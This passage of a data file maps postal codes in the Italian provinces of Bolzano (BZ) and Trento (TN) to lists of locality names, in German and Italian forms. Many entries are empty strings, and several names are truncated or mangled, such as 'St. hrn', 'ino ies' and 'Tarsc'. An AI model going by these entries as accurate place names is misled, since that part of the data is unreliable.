"BZ"], ["Gargazon", "BZ"], ["Prissiano", "BZ"], ["Gargazzone", "BZ"], ["Walten", "BZ"], ["Verano", "BZ"], ], "39011": [ ["Lana", "BZ"], ["Pawig", "BZ"], ["Vigiljoc", "BZ"], ["Völlan", "BZ"], ["Pavicolo", "BZ"], ["", "BZ"], ], "39012": [ ["", "BZ"], ["Sinic", "BZ"], ["Sinigo", "BZ"], ["Obermais", "BZ"], ["Gratsch", "BZ"], ["", "BZ"], ["Untermais", "BZ"], ["Meran", "BZ"], ["Merano", "BZ"], ], "39013": [ ["Moos", "BZ"], ["Moso In Passiria", "BZ"], ["Stuls", "BZ"], ["Plan In Passiria", "BZ"], ["Platt", "BZ"], ["Pfelder", "BZ"], ["Rabenstein", "BZ"], ["Ulfas", "BZ"], ], "39014": [["Postal", "BZ"], ["Burgstall", "BZ"]], "39015": [ ["Walte", "BZ"], ["San Leonardo In Passiria", "BZ"], ["St. Leonhard in Pass.", "BZ"], ["Schweinsteg", "BZ"], ["Valtina", "BZ"], ["Sant'Orsola", "BZ"], ["Windegg", "BZ"], ], "39016": [ ["St. Moritz/Ulten", "BZ"], ["Kuppelwies", "BZ"], ["St.Nikolau", "BZ"], ["Santa Valburga Ultimo", "BZ"], ["Ultimo", "BZ"], ["St.Walburg Ulte", "BZ"], ["Santa Geltrude In Ultimo", "BZ"], ["San Nicolo' Ultimo", "BZ"], ["San Nicolo'", "BZ"], ["Santa Valburga", "BZ"], ["St. Walburg/Ulten", "BZ"], ["Santa Gertrude", "BZ"], ], "39017": [["Verdins", "BZ"], ["Videgg", "BZ"], ["Schenna", "BZ"], ["Tall", "BZ"], ["Scena", "BZ"]], "39018": [ ["Vilpiano", "BZ"], ["Siebeneich", "BZ"], ["Vilpia", "BZ"], ["Terlan", "BZ"], ["Terlano", "BZ"], ["Settequerce", "BZ"], ], "39019": [["Tirolo", "BZ"], ["Tirol", "BZ"]], "39020": [ ["Tanas", "BZ"], ["Vernagt", "BZ"], ["Gand/Martell", "BZ"], ["Lichtenberg", "BZ"], ["Schluderns", "BZ"], ["Karthaus", "BZ"], ["Eyrs", "BZ"], ["Staben", "BZ"], ["", "BZ"], ["Plawenn", "BZ"], ["Melag", "BZ"], ["Planeil", "BZ"], ["St. .", "BZ"], ["Laatsch", "BZ"], ["Graun/Vinschg.", "BZ"], ["Matsch", "BZ"], ["Unsere ", "BZ"], ["Freiberg", "BZ"], ["Marein", "BZ"], ["Töll", "BZ"], ["Tartsch", "BZ"], ["Tabland", "BZ"], ["Marlengo", "BZ"], ["Marling", "BZ"], ["Tschengls", "BZ"], ["Glurns", "BZ"], ["Goldrain", "BZ"], ["Pedroß", "BZ"], ["", "BZ"], ["Tschars", "BZ"], ["Katharinaberg", "BZ"], ["Kastelbell", "BZ"], ["", "BZ"], ["Tol", "BZ"], ["", "BZ"], ["", "BZ"], ["Tarsch", "BZ"], ["Gries", "BZ"], ["Ciardes", "BZ"], ["Tubre", "BZ"], ["Sluderno", "BZ"], ["", "BZ"], ["Gomagoi", "BZ"], ["Glorenza", "BZ"], ["Parcines", "BZ"], ["Partschins", "BZ"], ["Senales", "BZ"], ["Tel", "BZ"], ["Montefranco", "BZ"], ["Rabland", "BZ"], ["Rabla'", "BZ"], ["Madonna", "BZ"], ["Trafoi", "BZ"], ["Castelbello", "BZ"], ["Martello", "BZ"], ["Hinterkirch", "BZ"], ["Morter", "BZ"], ["Stilfs", "BZ"], ["Rifair", "BZ"], ["Martell", "BZ"], ], "39021": [ ["Laces", "BZ"], ["Latsch", "BZ"], ["Morter", "BZ"], ["Morte", "BZ"], ["Goldrai", "BZ"], ["Tarsc", "BZ"], ["St. Kofl", "BZ"], ["Coldrano", "BZ"], ["Tarres", "BZ"], ], "39022": [ ["Oberplars", "BZ"], ["Vellau", "BZ"], ["Aschbach", "BZ"], ["Plars", "BZ"], ["Lagundo", "BZ"], ["Algund", "BZ"], ], "39023": [ ["Laas", "BZ"], ["Lasa", "BZ"], ["Allitz", "BZ"], ["Tana", "BZ"], ["Tarnell", "BZ"], ["Eyr", "BZ"], ["Tanas", "BZ"], ["Tschengel", "BZ"], ["Cengles", "BZ"], ["Oris", "BZ"], ], "39024": [ ["Laatsc", "BZ"], ["Marienberg", "BZ"], ["Planol", "BZ"], ["Planei", "BZ"], ["Tartsc", "BZ"], ["Schleis", "BZ"], ["Matsc", "BZ"], ["Mazia", "BZ"], ["Laudes", "BZ"], ["Burgusio", "BZ"], ["Schlinig", "BZ"], ["Burgeis", "BZ"], ["Tarces", "BZ"], ["", "BZ"], ["Mals", "BZ"], ], "39025": [["Plaus", "BZ"], ["Stabe", "BZ"], ["Stava", "BZ"], ["Naturno", "BZ"], ["Naturns", "BZ"]], "39026": [ ["Agums", "BZ"], ["Montechiaro", "BZ"], ["Prad", "BZ"], ["Lichtenber", "BZ"], ["", "BZ"], ], "39027": [["Resia", "BZ"], ["Reschen", "BZ"], ["", "BZ"], ["", "BZ"]], "39028": [ ["Silandro", "BZ"], ["Covelano", "BZ"], ["Vezzano", "BZ"], ["Schlanders", "BZ"], ["Talatsch", "BZ"], ["Vezzan", "BZ"], ["Goefla", "BZ"], ["Kortsch", "BZ"], ["Göflan", "BZ"], ], "39029": [ ["Trafo", "BZ"], ["Gomago", "BZ"], ["Stelvio", "BZ"], ["Sulden", "BZ"], ["Solda", "BZ"], ["Trafoi", "BZ"], ["Gomagoi", "BZ"], ], "39030": [ ["", "BZ"], ["St. Sigmund", "BZ"], ["Vallarga", "BZ"], ["", "BZ"], ["Niederolang", "BZ"], ["", "BZ"], ["Casteldarne", "BZ"], ["", "BZ"], ["Mühlen/Pfalzen", "BZ"], ["St.", "BZ"], ["", "BZ"], ["Obervintl", "BZ"], ["Zwischenwasser", "BZ"], ["Steinhaus", "BZ"], ["Enneberg/Mareo", "BZ"], [" in Ahrn", "BZ"], ["St. Veit in Prags", "BZ"], ["Chienes", "BZ"], ["Kiens", "BZ"], ["Issing", "BZ"], ["", "BZ"], ["Pflaurenz", "BZ"], ["Oberolang", "BZ"], ["Greinwalden", "BZ"], ["Kampill", "BZ"], ["Untergsies", "BZ"], ["St. ", "BZ"], ["Pichl", "BZ"], ["Untermoi", "BZ"], ["Margen", "BZ"], ["Saalen", "BZ"], ["Onach", "BZ"], ["Gais", "BZ"], ["Kasern", "BZ"], ["St. Johann in Ahrn", "BZ"], ["St.Vigi", "BZ"], ["Ahrntal", "BZ"], ["Oberrasen", "BZ"], ["Niederrasen", "BZ"], ["St. hrn", "BZ"], ["Percha", "BZ"], ["Vandoies", "BZ"], ["Campil", "BZ"], ["", "BZ"], ["Mitterolang", "BZ"], ["Hofern", "BZ"], ["", "BZ"], ["Nasen", "BZ"], ["Untervintl", "BZ"], ["Ahornach", "BZ"], ["Pikolein", "BZ"], ["Perca", "BZ"], ["Montal", "BZ"], ["", "BZ"], ["Kolfuschg", "BZ"], [" In Valle Aurina", "BZ"], ["", "BZ"], ["St.Johann In Ahrnta", "BZ"], ["St.Magdalen", "BZ"], ["St. Martin in Thurn/S. ", "BZ"], ["Longiaru'", "BZ"], [" In Valle Aurina", "BZ"], ["hrnta", "BZ"], ["St.Sigmun", "BZ"], ["Moo", "BZ"], ["Weitental", "BZ"], ["Pedero", "BZ"], ["Ehrenburg", "BZ"], ["Ellen", "BZ"], ["St. Magdalena i. G.", "BZ"], ["Wengen/", "BZ"], ["Oberwielenbach", "BZ"], ["", "BZ"], ["Wielenberg", "BZ"], ["", "BZ"], ["", "BZ"], ["", "BZ"], ["Stefansdorf", "BZ"], ["Kurfar", "BZ"], ["Longega", "BZ"], ["Weißenbach", "BZ"], ["San Vigilio", "BZ"], ["Geiselsberg", "BZ"], ["", "BZ"], ["Tesselberg", "BZ"], ["Niedervintl", "BZ"], ["", "BZ"], ["Vintl", "BZ"], ["Prettau", "BZ"], ["Terenten", "BZ"], ["Welschellen", "BZ"], ["", "BZ"], ["Terento", "BZ"], ["Lappach", "BZ"], ["Piccolino", "BZ"], ["Rodeneck", "BZ"], ["Sexten", "BZ"], ["Sesto", "BZ"], ["Cadipietra", "BZ"], ["Pfalzen", "BZ"], ["Falzes", "BZ"], ["Pfunders", "BZ"], ["Rein", "BZ"], ["ino ies", "BZ"], ["Uttenheim", "BZ"], ["", "BZ"], ["Mühlwald", "BZ"], ["Fundres", "BZ"], ["Predoi", "BZ"], ["Prags", "BZ"], ["Braies", "BZ"], ["", "BZ"], ["", "BZ"], ["Unterplanken", "BZ"], ["", "BZ"], ["Platten", "BZ"], ["Olang", "BZ"], ["Valdaora", "BZ"], ["Luttach", "BZ"], ["Antholz", "BZ"], ["San Martino ia", "BZ"], ["Lutago", "BZ"], ["Pederoa", "BZ"], ["Marebbe", "BZ"], ["", "BZ"], ], "39031": [ ["Luns", "BZ"], ["Bruneck", "BZ"], ["Riscone", "BZ"], ["Reischach", "BZ"], ["Aufhofen", "BZ"], ["Teodone", "BZ"], ["Dietenheim", "BZ"], ["Stegen", "BZ"], ["Brunico", "BZ"], ["", "BZ"], ], "39032": [ ["Kematen", "BZ"], ["", "BZ"], ["Ahornac", "BZ"], ["", "BZ"], ["Taufers/Ahrntal", "BZ"], ["", "BZ"], ["Sand ", "BZ"], ["", "BZ"], ["Acereto", "BZ"], ["", "BZ"], ], "39033": [["Kolfusch", "BZ"], ["Colfosco", "BZ"], ["", "BZ"], ["Corvara", "BZ"]], "39034": [["Toblach", "BZ"], ["Dobbiaco", "BZ"], ["Aufkirchen", "BZ"], ["Wahlen", "BZ"]], "39035": [["Monguelfo", "BZ"], ["Taisten", "BZ"], ["Tesido", "BZ"], ["Welsberg", "BZ"]], "39036": [ ["", "BZ"], ["", "BZ"], ["Stern", "BZ"], ["Pedraces", "BZ"], ["Badia", "BZ"], ["Abtei/Badia", "BZ"], ["", "BZ"], ["Pedrace", "BZ"], ], "39037": [ ["Mühlbach", "BZ"], ["Vals", "BZ"], ["Meransen", "BZ"], ["Spinges", "BZ"], ["Rodengo", "BZ"], ["", "BZ"], ], "39038": [["Vierschach", "BZ"], ["Winnebach", "BZ"], ["", "BZ"]], "39039": [["Villabassa", "BZ"], ["Niederdorf", "BZ"]], "39040": [ ["Stilves", "BZ"], ["Penon", "BZ"], ["Kastelruth", "BZ"], ["Proves", "BZ"], ["Campodazzo", "BZ"], ["Mauls", "BZ"], ["Villandro", "BZ"], ["", "BZ"], ["Lajen", "BZ"], ["Mareta", "BZ"], ["", "BZ"], ["Siusi", "BZ"], ["Ridanna", "BZ"], ["Barbiano", "BZ"], ["Petersberg", "BZ"], ["Olmi", "BZ"], ["Casateia", "BZ"], ["Tramin", "BZ"], ["Stanghe", "BZ"], ["", "BZ"], ["Neustift", "BZ"], ["Ratschings", "BZ"], ["Laion", "BZ"], ["Cauria", "BZ"], ["Novacella", "BZ"], ["Varna", "BZ"], ["Rasa", "BZ"], ["Salorno", "BZ"], ["", "BZ"], ["Ridnaun", "BZ"], ["Auer", "BZ"], ["Ora", "BZ"], ["Pfitsch", "BZ"], ["Aldino", "BZ"], ["Laag", "BZ"], ["", "BZ"], ["Racines", "BZ"], ["Salurn", "BZ"], ["Mareit", "BZ"], ["Villanders", "BZ"], ["Sciaves", "BZ"], ["Luson", "BZ"], ["Vahrn", "BZ"], ["Mühlen/Truden", "BZ"], ["Tanürz", "BZ"], ["Villnöß", "BZ"], ["Proveis", "BZ"], ["Pfulters", "BZ"], ["Söll", "BZ"], ["Pflersch", "BZ"], ["/Kastelr.", "BZ"], ["Graun/Unterl.", "BZ"], ["Lüsen", "BZ"], ["Flitt", "BZ"], ["Garn", "BZ"], ["Buchholz", "BZ"], ["Entiklar", "BZ"], ["Schmuders", "BZ"], ["Kollmann", "BZ"], ["Montan", "BZ"], ["Hohlen", "BZ"], ["Albions", "BZ"], ["Castelrotto", "BZ"], ["", "BZ"], ["Pruno", "BZ"], ["Feldthurns", "BZ"], ["St.", "BZ"], ["", "BZ"], ["Velturno", "BZ"], ["Gastei", "BZ"], ["Trodena", "BZ"], ["Magre' Sulla Strada Del Vino", "BZ"], ["Redagno", "BZ"], ["Laurein", "BZ"], ["Mules", "BZ"], ["Lauregno", "BZ"], ["", "BZ"], ["Raa", "BZ"], ["Radein", "BZ"], ["", "BZ"], ["", "BZ"], ["Atzwang", "BZ"], ["Truden", "BZ"], ["St.Lugan", "BZ"], ["Natz", "BZ"], ["Stilfes", "BZ"], ["Gfrill/Unterland", "BZ"], ["Funes", "BZ"], ["Fontanefredde", "BZ"], ["Schabs", "BZ"], ["Elzenbaum", "BZ"], ["", "BZ"], ["Valgiovo", "BZ"], ["", "BZ"], ["Termeno Sulla Strada Del Vino", "BZ"], ["Kurtinig", "BZ"], ["Waidbruck", "BZ"], ["Jaufental", "BZ"], ["Hole", "BZ"], ["Cortaccia Sulla Strada Del Vino", "BZ"], ["St.Pete", "BZ"], ["Altrei", "BZ"], ["Stange", "BZ"], ["Kaltenbrunn", "BZ"], ["Anterivo", "BZ"], ["Naz", "BZ"], ["Kurtatsch", "BZ"], ["Tschövas", "BZ"], ["Gschnon", "BZ"], ["Aldein", "BZ"], ["Klerant", "BZ"], ["Weißenstein", "BZ"], ["", "BZ"], ["Innerpfitsch", "BZ"], ["Margreid", "BZ"], ["Schnauders", "BZ"], ["Fennberg", "BZ"], ["Tagusens", "BZ"], ["Flans", "BZ"], ["Pinzon", "BZ"], ["", "BZ"], ["", "BZ"], ["Afers", "BZ"], ["Montagna", "BZ"], ["Freins", "BZ"], ["Rungg", "BZ"], ["", "BZ"], ["Trens", "BZ"], ["Telfes", "BZ"], ["Spiluck", "BZ"], ["St. ", "BZ"], ["Schrambach", "BZ"], ["Gossensaß", "BZ"], ["St. ", "BZ"], ["", "BZ"], ["Freienfeld", "BZ"], ["Barbian", "BZ"], ["Glen", "BZ"], ["", "BZ"], ["Viums", "BZ"], ["Schalders", "BZ"], ], "39041": [["Gossensas", "BZ"], ["Brennero", "BZ"], ["Brenner", "BZ"], ["", "BZ"]], "39042": [ ["", "BZ"], ["Albes", "BZ"], ["Neustift", "BZ"], ["Brixen", "BZ"], ["Eores", "BZ"], ["St.Andr", "BZ"], ["Sarns", "BZ"], ["Albeins", "BZ"], ["Zinggen", "BZ"], ["Afer", "BZ"], ["Pinzagen", "BZ"], ["Bressanone", "BZ"], ["Tschötsch", "BZ"], ["Mellaun", "BZ"], ["Elvas", "BZ"], ["Milland", "BZ"], ["Karnol", "BZ"], ["Tils", "BZ"], ], "39043": [ ["Teis", "BZ"], ["Verdings", "BZ"], ["Latzfons", "BZ"], ["Gufidaun", "BZ"], ["Gudon", "BZ"], ["Chiusa", "BZ"], ["Klausen", "BZ"], ["Lazfons", "BZ"], ], "39044": [["Laghetti", "BZ"], ["Mazon", "BZ"], ["Neumarkt", "BZ"], ["Egna", "BZ"]], "39045": [ ["Oberau", "BZ"], ["Mittewald", "BZ"], ["Grasstein", "BZ"], ["Fortezza", "BZ"], ["Franzensfeste", "BZ"], ], "39046": [["St. Ulrich/Urtijei", "BZ"], ["Ortisei", "BZ"], ["Pufels", "BZ"], ["St. Jakob", "BZ"]], "39047": [["", "BZ"], ["St. Christina/S. Crestina -Gherdeina", "BZ"]], "39048": [["", "BZ"], ["Selva", "BZ"], ["Wolkenstein/Selva", "BZ"]], "39049": [ ["Flains", "BZ"], ["Steckholz", "BZ"], ["Thuins", "BZ"], ["Kematen/Pfitsch", "BZ"], ["", "BZ"], ["Bahnho", "BZ"], ["Tschöfs", "BZ"], ["Prati", "BZ"], ["Wiesen", "BZ"], ["Sterzing", "BZ"], ["Ried", "BZ"], ["Vipiteno", "BZ"], ["Stazione", "BZ"], ], "39050": [ ["Valas", "BZ"], ["Völs am Schlern", "BZ"], ["", "BZ"], ["Prösels", "BZ"], ["Oberinn", "BZ"], ["Breien", "BZ"], ["Gummer", "BZ"], ["Eggen", "BZ"], ["Steinmannwald", "BZ"], ["Unterrain/Eppan", "BZ"], ["St. Justina/Eppan", "BZ"], ["St. ", "BZ"], ["Missian", "BZ"], ["San Nicolo' D'Ega", "BZ"], ["Wangen", "BZ"], ["Jenesien", "BZ"], ["Lengstein", "BZ"], ["Seit", "BZ"], ["", "BZ"], ["Ums", "BZ"], ["Perdonig", "BZ"], ["/Bozen", "BZ"], ["Tiers", "BZ"], ["Karneid", "BZ"], ["Steinegg", "BZ"], ["Birchabruck", "BZ"], ["", "BZ"], ["Flaas", "BZ"], ["Blumau", "BZ"], ["Raut", "BZ"], ["", "BZ"], ["Untereggen", "BZ"], ["", "BZ"], ["Innichen", "BZ"], ["San Paolo", "BZ"], ["Afing", "BZ"], ["Unterglaning", "BZ"], ["Girlan", "BZ"], ["", "BZ"], ["St.Pauls", "BZ"], ["Unterinn", "BZ"], ["St. Pauls/Eppan", "BZ"], ["", "BZ"], ["Petersberg", "BZ"], ["Deutschnofen", "BZ"], ["", "BZ"], ["Avigna", "BZ"], ["'", "BZ"], ["Tires", "BZ"], ], "39051": [["Branzoll", "BZ"], ["Bronzolo", "BZ"], ["Pfatten", "BZ"], ["Vadena", "BZ"]], "39052": [ ["", "BZ"], ["St. Nikolaus/Kaltern", "BZ"], ["Oberplanitzing", "BZ"], ["", "BZ"], ["Mitterdorf", "BZ"], ["Altenburg", "BZ"], ["Unterplanitzing", "BZ"], ["Kaltern", "BZ"], ["", "BZ"], ], "39053": [ ["Kardaun", "BZ"], ["Collepietra", "BZ"], ["", "BZ"], ["San Valento", "BZ"], ["", "BZ"], ["Eggenta", "BZ"], ["", "BZ"], ["Cardano", "BZ"], ["Kardaun/Bozen", "BZ"], ["Steineg", "BZ"], ["Bluma", "BZ"], ["Gumme", "BZ"], ], "39054": [ ["Gissmann", "BZ"], ["Unterin", "BZ"], ["", "BZ"], ["Wange", "BZ"], ["Collalbo", "BZ"], ["Lengmoos", "BZ"], ["", "BZ"], ["Oberi", "BZ"], ["", "BZ"], ["Oberboze", "BZ"], ["Ritten", "BZ"], ["", "BZ"], ["Renon", "BZ"], ["Vanga", "BZ"], ["Klobenstein", "BZ"], ["Soprabolzano", "BZ"], ], "39055": [ ["Laives", "BZ"], ["", "BZ"], ["", "BZ"], ["Leifers", "BZ"], ["", "BZ"], [" Di Laives", "BZ"], ["", "BZ"], ["Pineta", "BZ"], ["St.", "BZ"], ], "39056": [ ["", "BZ"], ["Karersee", "BZ"], ["Carezza", "BZ"], ["Welschnofen", "BZ"], ["", "BZ"], ], "39057": [ ["Cornaiano", "BZ"], ["", "BZ"], ["Girla", "BZ"], ["Eppan", "BZ"], ["", "BZ"], ["", "BZ"], ["Montiggl", "BZ"], ["Frangar", "BZ"], ["/Eppan", "BZ"], ["Frangarto", "BZ"], ], "39058": [ ["Pens", "BZ"], ["Nordhei", "BZ"], ["Sarentino", "BZ"], ["Asten", "BZ"], ["Riedelsberg", "BZ"], ["Bundschen", "BZ"], ["Weißenbach/Sarntal", "BZ"], ["Reinswald", "BZ"], ["Durnholz", "BZ"], ["Villa", "BZ"], ["Astfeld-Nordheim", "BZ"], ["Sarnthein", "BZ"], ["Campolasta", "BZ"], ["Aberstückl", "BZ"], ], "39059": [["Wolfsgruben", "BZ"], ["Oberbozen", "BZ"]], "39100": [ ["Kampenn", "BZ"], ["Glaning", "BZ"], ["Sigmundskro", "BZ"], ["Castelfirmiano", "BZ"], ["Oberau/Bozen", "BZ"], ["Signat", "BZ"], ["Rentsch", "BZ"], ["Bozen", "BZ"], ["Bolzano", "BZ"], ], "38010": [ ["Faedo", "TN"], ["Campodenno", "TN"], ["Spormaggiore", "TN"], ["Malgolo", "TN"], ["Cavedago", "TN"], ["Sporminore", "TN"], ["Ronzone", "TN"], ["Denno", "TN"], ["Dambel", "TN"], ["", "TN"], ["Andalo", "TN"], ["", "TN"], ["Casez", "TN"], ["", "TN"], ["Sanzeno", "TN"], ["", "TN"], ["Banco", "TN"], ["Ruffre'", "TN"], ["Ton", "TN"], ["Sfruz", "TN"], ["Romeno", "TN"], ["", "TN"], ["", "TN"], ["Tavon", "TN"], ], "38011": [["Seio", "TN"], ["Amblar", "TN"], ["Don", "TN"], ["Sarnonico", "TN"], ["Cavareno", "TN"]], "38012": [ ["Segno", "TN"], ["Coredo", "TN"], ["Vervò", "TN"], ["Smarano", "TN"], ["Predaia", "TN"], ["Tres", "TN"], ["Dermulo", "TN"], ["Mollaro", "TN"], ["Taio", "TN"], ], "38013": [["Tret", "TN"], ["Malosco", "TN"], ["Vasio", "TN"], ["Fondo", "TN"]], "38015": [["Lavis", "TN"], ["", "TN"], ["Pressano", "TN"]], "38016": [["Mezzocorona", "TN"]], "38017": [["Mezzolombardo", "TN"]], "38018": [["Molveno", "TN"]], "38019": [["Tassullo", "TN"], ["Tuenno", "TN"], ["Nanno", "TN"]], "38020": [ ["Deggiano", "TN"], ["Mocenigo", "TN"], ["Pellizzano", "TN"], ["Cloz", "TN"], ["Commezzadura", "TN"], ["Bresimo", "TN"], ["Rabbi", "TN"], ["Rumo", "TN"], ["Marcena", "TN"], ["Castelfondo", "TN"], ["Mestriago", "TN"], ["Mezzana", "TN"], ["Pracorno", "TN"], ["Cis", "TN"], ], "38021": [["Brez", "TN"]], "38022": [["Cavizzana", "TN"], ["Caldes", "TN"], ["Bozzana", "TN"]], "38023": [["Mechel", "TN"], ["Caltron", "TN"], ["Cles", "TN"]], "38024": [ ["Cogolo", "TN"], ["", "TN"], ["Celledizzo", "TN"], ["Celedizzo", "TN"], ["Peio", "TN"], ], "38025": [["Monclassico", "TN"], ["Dimaro", "TN"]], "38026": [["", "TN"], ["Ossana", "TN"], ["Cusiano", "TN"], ["Fucine", "TN"]], "38027": [["Male'", "TN"], ["Terzolas", "TN"], ["Croviana", "TN"]], "38028": [["Tregiovo", "TN"], ["Romallo", "TN"], ["Revo'", "TN"], ["Cagno'", "TN"]], "38029": [["", "TN"], ["Fraviano", "TN"], ["Vermiglio", "TN"]], "38030": [ ["Soraga", "TN"], ["Daiano", "TN"], ["Molina", "TN"], ["", "TN"], ["Varena", "TN"], ["", "TN"], ["Stramentizzo", "TN"], ["Capriana", "TN"], ["", "TN"], ["Giovo", "TN"], ["Panchia'", "TN"], ["", "TN"], ["Palu'", "TN"], ["Stramentizzo Nuovo", "TN"], ["Verla", "TN"], ["", "TN"], ["Campestrin", "TN"], ["Mazzin", "TN"], ], "38031": [["", "TN"]], "38032": [["", "TN"], ["", "TN"], ["Penia", "TN"], ["Canazei", "TN"]], "38033": [["Carano", "TN"], ["Cavalese", "TN"], ["", "TN"]], "38034": [["Lisignago", "TN"], ["Cembra", "TN"]], "38035": [["", "TN"], ["Moena", "TN"], ["Forno", "TN"]], "38036": [["Pera", "TN"], ["", "TN"], ["Pozza Di Fassa", "TN"]], "38037": [["Paneveggio", "TN"], ["Predazzo", "TN"], ["", "TN"], ["Bellamonte", "TN"]], "38038": [["Tesero", "TN"]], "38039": [["", "TN"], ["Costalunga", "TN"], ["", "TN"]], "38040": [ ["Fornace", "TN"], ["Lases", "TN"], ["Valfloriana", "TN"], ["Lona Lases", "TN"], ["Ravina", "TN"], ["Luserna", "TN"], ["Lona", "TN"], ], "38041": [["Albiano", "TN"]], "38042": [ ["Campolongo", "TN"], ["'", "TN"], ["Faida", "TN"], ["Rizzolaga", "TN"], ["'", "TN"], ["Montagnaga", "TN"], ["San Mauro", "TN"], ], "38043": [["Regnana", "TN"], ["Bedollo", "TN"], ["Brusago", "TN"]], "38045": [["Civezzano", "TN"], ["Seregnano", "TN"]], "38046": [["Gionghi", "TN"], ["", "TN"], ["Lavarone", "TN"], ["Cappella", "TN"]], "38047": [["Valcava", "TN"], ["Sevignano", "TN"], ["Quaras", "TN"], ["Segonzano", "TN"]], "38048": [["Sover", "TN"]], "38049": [ ["", "TN"], ["Bosentino", "TN"], ["Centa San Nicolo'", "TN"], ["Vattaro", "TN"], ["Migazzone", "TN"], ], "38050": [ ["", "TN"], ["Ospedaletto", "TN"], ["Torcegno", "TN"], ["", "TN"], ["Fierozzo", "TN"], ["Marter", "TN"], ["Prade", "TN"], ["Tenna", "TN"], ["", "TN"], ["Bieno", "TN"], ["", "TN"], ["Carzano", "TN"], ["", "TN"], ["", "TN"], ["", "TN"], ["", "TN"], ["", "TN"], ["Imer", "TN"], ["Castelnuovo", "TN"], ["Novaledo", "TN"], ["Scurelle", "TN"], ["Gobbera", "TN"], ["", "TN"], ["Mezzano", "TN"], ["", "TN"], ["Caoria", "TN"], ["Frassilongo", "TN"], ["", "TN"], ["Telve", "TN"], ["", "TN"], ["Roncegno", "TN"], ], "38051": [["", "TN"], ["Borgo", "TN"], ["Olle", "TN"]], "38052": [["Caldonazzo", "TN"]], "38053": [["", "TN"]], "38054": [ ["Siror", "TN"], ["", "TN"], ["Transacqua", "TN"], ["", "TN"], ["Tonadico", "TN"], ], "38055": [ ["Tezze", "TN"], ["", "TN"], ["", "TN"], ["Selva", "TN"], ["Grigno", "TN"], ], "38056": [["Barco", "TN"], ["", "TN"]], "38057": [ ["", "TN"], ["Vignola", "TN"], ["Falesina", "TN"], ["Costasavina", "TN"], ["Susa'", "TN"], ["Canezza", "TN"], ["", "TN"], ["Viarago", "TN"], ["Roncogno", "TN"], ["Canale", "TN"], ["", "TN"], ["Serso", "TN"], ["Vigalzano", "TN"], ["", "TN"], ["", "TN"], ["Canzolino", "TN"], ["Madrano", "TN"], ], "38059": [ ["", "TN"], ["", "TN"], ["Strigno", "TN"], ["Spera", "TN"], ["Samone", "TN"], ["Agnedo", "TN"], ], "38060": [ ["Tenno", "TN"], ["", "TN"], ["Valmorbia", "TN"], ["Corte", "TN"], ["Ronzo", "TN"], ["", "TN"], ["", "TN"], ["Castellano", "TN"], ["", "TN"], ["Chienis", "TN"], ["Pedersano", "TN"], ["", "TN"], ["Castione", "TN"], ["", "TN"], ["Anghebeni", "TN"], ["Pregasina", "TN"], ["", "TN"], ["Cimone", "TN"], ["Isera", "TN"], ["Nogaredo", "TN"], ["Besenello", "TN"], ["Cornale'", "TN"], ["Valduga", "TN"], ["", "TN"], ["Bezzecca", "TN"], ["", "TN"], ["", "TN"], ["Nomi", "TN"], ["Cologna", "TN"], ["Brentonico", "TN"], ["Volano", "TN"], ["Terragnolo", "TN"], ["Raossi", "TN"], ["", "TN"], ["Romagnano", "TN"], ["Concei", "TN"], ["Aldeno", "TN"], ["Vallarsa", "TN"], ["Crosano", "TN"], ["Pomarolo", "TN"], ], "38061": [ ["", "TN"], ["Pilcante", "TN"], ["", "TN"], ["Ala", "TN"], ["Chizzola", "TN"], ["Serravalle", "TN"], ["", "TN"], ], "38062": [["Oltresarca", "TN"], ["Arco", "TN"], ["Bolognano", "TN"], ["", "TN"], ["Vignole", "TN"]], "38063": [["Sabbionara", "TN"], ["", "TN"], ["Avio", "TN"]], "38064": [ ["", "TN"], ["Folgaria", "TN"], ["Mezzomonte", "TN"], ["Nosellari", "TN"], ["", "TN"], ["Serrada", "TN"], ["Serrada Di Folgaria", "TN"], ["", "TN"], ["Carbonare", "TN"], ["Mezzomonte Di Sopra", "TN"], ], "38065": [ ["Manzano", "TN"], ["Besagno", "TN"], ["Sano", "TN"], ["", "TN"], ["Mori", "TN"], ["Pannone", "TN"], ], "38066": [["Varone", "TN"], ["", "TN"]], "38067": [["Mezzolago", "TN"], ["", "TN"], ["Ledro", "TN"]], "38068": [ ["Rovereto", "TN"], ["", "TN"], ["", "TN"], ["Trambileno", "TN"], ["Lizzanella", "TN"], ["Marco", "TN"], ], "38069": [["", "TN"], ["Torbole", "TN"], ["Nago", "TN"]], "38070": [["Tavodo", "TN"], ["", "TN"], ["Lomaso", "TN"], ["Stenico", "TN"]], "38071": [ ["Larido", "TN"], ["Marazzone", "TN"], ["", "TN"], ["", "TN"], ["Bivedo", "TN"], ], "38073": [["Vigo", "TN"], ["", "TN"], ["Stravino", "TN"], ["Cavedine", "TN"]], "38074": [["Drena", "TN"], ["Ceniga", "TN"], ["Dro", "TN"], ["Pietramurata", "TN"]], "38075": [["Ballino", "TN"], ["Fiave'", "TN"]], "38076": [ ["", "TN"], ["Calavino", "TN"], ["Lasino", "TN"], ["Sarche", "TN"], ["Madruzzo", "TN"], ], "38077": [ ["", "TN"], ["", "TN"], ["Lundo", "TN"], ["", "TN"], ["", "TN"], ], "38078": [ ["Dorsino", "TN"], ["Moline", "TN"], ["", "TN"], ["", "TN"], ["", "TN"], ], "38079": [["Bolbeno", "TN"], ["Zuclo", "TN"], ["", "TN"], ["Pelugo", "TN"], ["Saone", "TN"]], "38080": [ ["Baitoni", "TN"], ["Carisolo", "TN"], ["Bocenago", "TN"], ["Bondone", "TN"], ["Strembo", "TN"], ["", "TN"], ["Caderzone", "TN"], ], "38082": [["", "TN"]], "38083": [["Condino", "TN"], ["Brione", "TN"], ["Cimego", "TN"]], "38085": [["", "TN"], ["Creto", "TN"], ["Prezzo", "TN"]], "38086": [ ["Massimeno", "TN"], ["", "TN"], ["Pinzolo", "TN"], ["", "TN"], ["Giustino", "TN"], ], "38087": [["Bondo", "TN"], ["Lardaro", "TN"], ["Roncone", "TN"], ["Breguzzo", "TN"]], "38088": [["", "TN"], ["Spiazzo", "TN"]], "38089": [["Storo", "TN"], ["Darzo", "TN"], ["Lodrone", "TN"]], "38091": [["Praso", "TN"], ["Bersone", "TN"], ["Valdaone", "TN"], ["Daone", "TN"]], "38092": [["Grauno", "TN"], ["Grumes", "TN"], ["Valda", "TN"], ["Faver", "TN"]], "38093": [["Terres", "TN"], ["Flavon", "TN"], ["Cunevo", "TN"]], "38094": [ ["Verdesina", "TN"], ["", "TN"], ["", "TN"], ["Iavre'", "TN"], ["Dare'", "TN"], ], "38095": [["Ragoli", "TN"], ["Montagne", "TN"], ["Preore", "TN"]], "38096": [["Vezzano", "TN"], ["Terlago", "TN"], 